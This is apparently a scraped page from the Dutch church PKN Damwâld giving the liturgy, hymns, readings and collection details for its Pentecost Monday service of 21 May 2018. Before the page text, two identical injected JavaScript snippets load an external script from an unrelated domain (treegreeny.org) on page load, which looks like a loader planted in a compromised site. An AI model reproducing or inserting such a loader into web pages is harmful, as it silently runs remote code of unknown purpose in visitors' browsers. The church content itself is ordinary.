;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Pinkstermaandag - PKN Damwâld
maandag 21 mei 2018
09:30 uur

Pinkstermaandag

Thema: Tweede Pinksterdag

Informatie

Voorganger:Ds. S. Boukes
Organist:Nienke van der Heide-Visser
Thema:Tweede Pinksterdag
Liturgie
Lied voor de dienst ELB 144
Kerkenraad komt binnen, daarna zingen we staande :
Intochtslied Ps.40:1,4
Stil gebed , Votum en Groet
Lezing van de Geloofsbelijdenis van Nicea .
We zingen: ELB 218:1,3
Gebed
We lezen: Hand.2:14-21, 32-33
We zingen: Gez.244:1,4
We lezen: Mat.10:16-20
We zingen: Gez.250:1,4,5
Preek Mat.10:20
We zingen: Gez.473:3,5
Dankgebed en voorbeden
Collecte
Slotlied Gez.360:3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: kerkelijk Recreatiewerk Lauwersmeergebied

Op 18 mei 1976 werd vanuit de Kerkgemeenschappen rond Lauwersoog de Vereniging tot Kerkelijk Recreatiewerk in het Lauwersmeergebied opgericht, kortweg VKRW Lauwersoog. Bij veel mensen beter bekend als de "Witte Tent op Lauwersoog. Want in deze "Witte Tent" spelen zich gedurende 7 weken in de zomerperiode de activiteiten van de vereniging af. Op dit moment bestaan de activiteiten van de vereniging uit het organiseren van diensten op de zondagmorgen en sing-ins op de zondagavond.

Tweede collecte: Kerk
Uitganscollecte: Kerk